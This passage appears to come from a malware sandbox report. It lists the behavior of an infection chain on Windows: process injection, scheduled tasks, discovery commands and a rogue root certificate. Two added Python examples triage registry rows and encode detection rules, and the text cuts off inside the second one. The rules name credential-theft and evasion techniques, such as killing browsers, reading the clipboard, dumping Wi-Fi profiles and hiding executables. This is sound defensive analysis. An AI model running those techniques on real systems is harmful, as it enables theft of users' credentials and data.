| File opened for modification | C:\Windows\system32\winsvc.exe | C:\Users\Admin\AppData\Local\Temp\SetupWizard-61e52716fb0d7ba6\SetupWizard.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\1000004001\FirstZ.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\wikombernizc\reakuqnanrkn.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2148 set thread context of 1628 | N/A | C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3528 set thread context of 2628 | N/A | C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4928 set thread context of 4948 | N/A | C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
| PID 1876 set thread context of 3008 | N/A | C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3632 set thread context of 2572 | N/A | C:\ProgramData\wikombernizc\reakuqnanrkn.exe | C:\Windows\system32\conhost.exe |
| PID 3632 set thread context of 4132 | N/A | C:\ProgramData\wikombernizc\reakuqnanrkn.exe | C:\Windows\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\explortu.job | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\1000015002\cf2c0e9ce8.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe | N/A |
| File created | C:\Windows\Tasks\Dctooux.job | C:\Users\Admin\AppData\Local\Temp\1000003001\b2c2c1.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Embeds OpenSSL
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
These rows record key creation under the .DEFAULT hive (the profile used by processes running as LocalSystem) plus two Internet Settings zone-map values. CryptoAPI creates the SystemCertificates and WinTrust keys the first time a process under that profile opens a certificate store, and the ZoneMap values are Internet Explorer security-zone defaults, so the rows show that powershell.exe (and, in two rows, explorer.exe) ran in that context rather than that any certificate was added here. The actual certificate write is the ROOT store entry listed under "Modifies system certificate store".
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3107365284-1576850094-161165143-1000\{A847B8BD-8526-443F-AFC1-C4DD10F58343} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies system certificate store
Unlike the .DEFAULT-hive key creations above, this is a real store modification: svhoost.exe creates a key in the machine-wide ROOT store and writes its Blob value, which installs a new trusted root certificate. The key name F1A578C4CB5DE79A370893983FD4DA8B67B2B064 is the certificate's SHA-1 thumbprint. Until it is removed, any TLS server certificate or Authenticode signature chaining to it is trusted by CryptoAPI-based clients on the host; on a suspect machine the thumbprint can be looked up under Cert:\LocalMachine\Root in PowerShell.
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
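To make the read-versus-write distinction concrete, here is an added Python example (not part of this report and not the sandbox vendor's signature logic) that parses rows in the table format used on this page and answers two questions a reviewer wants from the "Event Triggered Execution: Netsh Helper DLL" table and the certificate store table above: was anything written under the NetSh helper key, and which thumbprints were written into the machine ROOT store. The split of the Description column into read and write operations, the sample rows (constructed copies of rows on this page, with the blob contents omitted) and the thumbprint pattern are the author's assumptions.

```python
"""Triage sandbox registry rows: did anything actually get written?

Added example, not part of the original report or of the sandbox's own
signature logic. The sample rows are constructed copies of rows shown in
this report; which operations count as writes, and what a root-store
install looks like, are the author's assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Operations that only observe the registry versus ones that change it
# (assumed mapping of the report's "Description" column).
READ_OPS = {"Key opened", "Key queried", "Key value queried", "Key value enumerated"}
WRITE_OPS = {"Key created", "Key deleted", "Set value (data)", "Set value (int)", "Set value (str)"}

# netsh.exe reads this key on every start to load its helper DLLs, so reads
# here are expected whenever netsh runs; only a write registers a new helper.
NETSH_HELPER_KEY = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh"

# Machine-wide trusted root store; the key name is the certificate's SHA-1 thumbprint.
ROOT_CERT_RE = re.compile(
    r"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\([0-9A-F]{40})",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class RegEvent:
    op: str         # "Key opened", "Set value (data)", ...
    indicator: str  # registry path, optionally followed by "\Value = data"
    process: str    # image path of the acting process


def parse_rows(table: str) -> list[RegEvent]:
    """Parse '| Description | Indicator | Process | Target |' rows into events."""
    events = []
    for line in table.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 3 or cells[0] in ("Description", "N/A"):
            continue  # header row, or a row carrying no registry data
        events.append(RegEvent(op=cells[0], indicator=cells[1], process=cells[2]))
    return events


def netsh_helper_registered(events: list[RegEvent]) -> bool:
    """True only if some process wrote under the NetSh helper key."""
    key = NETSH_HELPER_KEY.upper()
    return any(e.op in WRITE_OPS and e.indicator.upper().startswith(key) for e in events)


def installed_root_certs(events: list[RegEvent]) -> dict[str, str]:
    """Map thumbprint -> installing process for writes into the machine ROOT store."""
    found: dict[str, str] = {}
    for e in events:
        m = ROOT_CERT_RE.search(e.indicator)
        if m and e.op in WRITE_OPS:
            found[m.group(1).upper()] = e.process
    return found


# Constructed from rows in this report (blob contents omitted, as on the page).
SAMPLE_TABLE = r"""
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
"""


def triage(table: str) -> dict:
    """The two verdicts a reviewer wants from the signatures discussed above."""
    events = parse_rows(table)
    return {
        "netsh_helper_registered": netsh_helper_registered(events),
        "root_certs_installed": installed_root_certs(events),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_TABLE))
```

On the sample rows the helper verdict is False (reads only) while the ROOT store verdict names one thumbprint and the installing process, which is the conclusion the two tables support.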
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000016001\f2e8263483.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
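Most of the signatures tabulated above carry no indicator beyond "process X ran"; the detail lives in the command lines recorded in the process list that follows. The following added Python example (not part of this report and not vendor detection content) turns those command lines into process-creation detection rules and runs them over a constructed sample of events copied from the list: the chained discovery one-liner, attrib +h +s on an executable under AppData, taskkill /F against chrome.exe, PowerShell Get-Clipboard, netsh wlan show profiles, wmic csproduct get uuid and the mshta fake-error popup. The event field names, the ampersand and token thresholds for the discovery chain and the browser list are assumptions.

```python
"""Process-creation rules modeled on the command lines in this report.

Added example, not part of the original report and not vendor detection
content. Sample events are constructed from command lines recorded in the
process list; field names, thresholds and the browser list are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str    # full path of the created process
    cmdline: str  # its command line


# Discovery tools that the report shows chained into one cmd.exe line.
RECON_TOKENS = (
    "systeminfo", "tasklist", "ipconfig", "netstat", "net user", "net localgroup",
    "route print", "arp -a", "sc query", "netsh firewall", "wmic startup",
    "wmic logicaldisk", "query user", "hostname",
)
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe")


def recon_chain(cmd: str) -> bool:
    """One cmd.exe line that strings several discovery tools together with '&'."""
    low = cmd.lower()
    return low.count("&") >= 3 and sum(t in low for t in RECON_TOKENS) >= 4


def hides_appdata_exe(cmd: str) -> bool:
    """attrib +h +s on an executable inside a user profile (hidden + system)."""
    low = cmd.lower()
    return ("attrib" in low and "+h" in low and "+s" in low
            and re.search(r"\\appdata\\.*\.exe", low) is not None)


def kills_browser(cmd: str) -> bool:
    """Forced termination of a browser, typically to unlock its credential DBs."""
    low = cmd.lower()
    return "taskkill" in low and "/f" in low and any(b in low for b in BROWSERS)


def reads_clipboard(cmd: str) -> bool:
    return "get-clipboard" in cmd.lower()


def dumps_wifi_profiles(cmd: str) -> bool:
    return re.search(r"netsh\s+wlan\s+show\s+profiles?", cmd, re.I) is not None


def queries_hw_uuid(cmd: str) -> bool:
    """SMBIOS UUID lookup, used here as a machine/sandbox fingerprint."""
    return re.search(r"wmic\s+csproduct\s+get\s+uuid", cmd, re.I) is not None


def fake_error_popup(cmd: str) -> bool:
    """mshta running inline JScript that pops a 'System Error' message box."""
    low = cmd.lower()
    return ("mshta" in low and "javascript:" in low
            and "wscript.shell" in low and ".popup(" in low)


RULES = {
    "recon_chain": recon_chain,
    "hides_appdata_exe": hides_appdata_exe,
    "kills_browser": kills_browser,
    "reads_clipboard": reads_clipboard,
    "dumps_wifi_profiles": dumps_wifi_profiles,
    "queries_hw_uuid": queries_hw_uuid,
    "fake_error_popup": fake_error_popup,
}


def evaluate(events: list[ProcEvent]) -> list[tuple[str, str]]:
    """Return (rule_name, image) for every event that trips a rule."""
    hits = []
    for e in events:
        for name, rule in RULES.items():
            if rule(e.cmdline):
                hits.append((name, e.image))
    return hits


# Constructed sample, copied from command lines in this report's process list.
CMD = r"C:\Windows\system32\cmd.exe"
SAMPLE_EVENTS = [
    ProcEvent(CMD, r'C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"'),
    ProcEvent(CMD, r'C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""'),
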